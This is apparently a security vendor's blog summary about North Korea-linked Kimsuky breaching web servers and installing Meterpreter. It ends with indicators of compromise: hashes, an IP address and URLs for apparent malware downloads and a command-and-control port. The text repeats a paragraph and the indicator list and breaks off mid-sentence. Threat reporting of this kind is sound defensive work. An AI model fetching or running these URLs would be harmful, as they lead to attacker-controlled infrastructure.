Kimsuky Group Using Meterpreter to Attack Web Servers
Contents
AhnLab Security Emergency response Center (ASEC) has recently discovered the distribution of malware targeting web servers by Kimsuky group. Kimsuky is a threat group deemed supported by North Korea and has been active since 2013. At first, they attacked North Korea-related research institutes in South Korea before attacking a Korean energy corporation in 2014. Since 2017, their attacks have been targeting countries other than South Korea as well. [1]
ASEC has been providing the analysis of various cases of Kimsuky attacks on the ASEC Blog, mainly spear phishing attacks which involved malicious file attachments to emails in MS Office document files[2], OneNote [3], or CHM [4]file formats. Kimsuky group usually uses social engineering attacks like the aforementioned spear phishings, but this post will cover the attack cases that targeted web servers. After a successful breach, Kimsuky installed the Metasploit Meterpreter backdoor malware. There have also been identified logs of a proxy …
ASEC has been providing the analysis of various cases of Kimsuky attacks on the ASEC Blog, mainly spear phishing attacks which involved malicious file attachments to emails in MS Office document files[2], OneNote [3], or CHM [4]file formats. Kimsuky group usually uses social engineering attacks like the aforementioned spear phishings, but this post will cover the attack cases that targeted web servers. After a successful breach, Kimsuky installed the Metasploit Meterpreter backdoor malware. There have also been identified logs of a proxy …
IoC
000130a373ea4085b87b97a0c7000c86
45.58.52.82
6b2062e61bcb46ce5ff19b329ce31b03
http://45.58.52.82/cl.exe
http://45.58.52.82/up.dat
http://45.58.52.82:8443
45.58.52.82
6b2062e61bcb46ce5ff19b329ce31b03
http://45.58.52.82/cl.exe
http://45.58.52.82/up.dat
http://45.58.52.82:8443